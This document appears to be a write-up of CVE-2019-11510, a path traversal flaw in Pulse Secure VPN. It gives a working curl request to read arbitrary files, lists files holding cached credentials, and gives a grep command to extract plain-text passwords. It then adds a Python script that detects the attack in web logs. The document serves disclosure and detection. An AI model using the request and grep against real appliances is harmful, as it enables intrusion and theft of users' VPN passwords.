Pulse Secure (CVE-2019-11510)

Description

There is a path traversal vulnerability in the Pulse Secure VPN endpoint. The following request reads /etc/hosts from the appliance:

curl --path-as-is -k -D- 'https://<hostname>/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'

You can grab the following files:

/data/runtime/mtmp/system
/data/runtime/mtmp/lmdb/dataa/data.mdb
/data/runtime/mtmp/lmdb/dataa/lock.mdb
/data/runtime/mtmp/lmdb/randomVal/data.mdb
/data/runtime/mtmp/lmdb/randomVal/lock.mdb

VPN usernames and hashed passwords are stored in the mtmp/system file, but when a user logs in, the application caches the plain-text password in dataa/data.mdb.

grep -a 'password@9' data.mdb

https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101
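
For detection, the request shape and file list above can be matched in web or proxy logs. The script below is an added example, not part of the original write-up or any vendor tooling; it assumes Common Log Format input, and the sample lines, function names and verdict labels are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Directory holding the files the page lists as readable.
SENSITIVE_PREFIX = "/data/runtime/mtmp/"
# Constructed sample lines in Common Log Format (assumed format, e.g. a proxy
# log; not the appliance's own log format). Addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [21/Aug/2019:10:01:02 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 7421
203.0.113.9 - - [21/Aug/2019:10:03:11 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/ HTTP/1.1" 200 212
203.0.113.9 - - [21/Aug/2019:10:03:15 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/ HTTP/1.1" 200 90112
"""
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)$')

def resolve(target):
    """Return (decoded path, path with dot segments collapsed)."""
    path = urlsplit(target).path
    prev = None
    while prev != path:  # decode repeatedly so nested encoding is not missed
        prev, path = path, unquote(path)
    return path, posixpath.normpath(path)

def classify(target):
    """Return None, 'traversal' or 'credential-file' for one request target."""
    raw, resolved = resolve(target)
    if not raw.startswith("/dana-na/") or "/../" not in raw:
        return None
    if resolved.startswith(("/dana-na/", "/dana/")):
        return None  # dot segments resolve to a path still under the web paths
    if resolved.startswith(SENSITIVE_PREFIX):
        return "credential-file"
    return "traversal"

def scan(log_text):
    """Return [(client, verdict, status, resolved_path)] for suspicious lines."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        verdict = classify(m.group(3)) if m else None
        if verdict:
            hits.append((m.group(1), verdict, int(m.group(4)), resolve(m.group(3))[1]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A credential-file hit with status 200 suggests the cached-password database was served, so the accounts it contains should be treated as exposed.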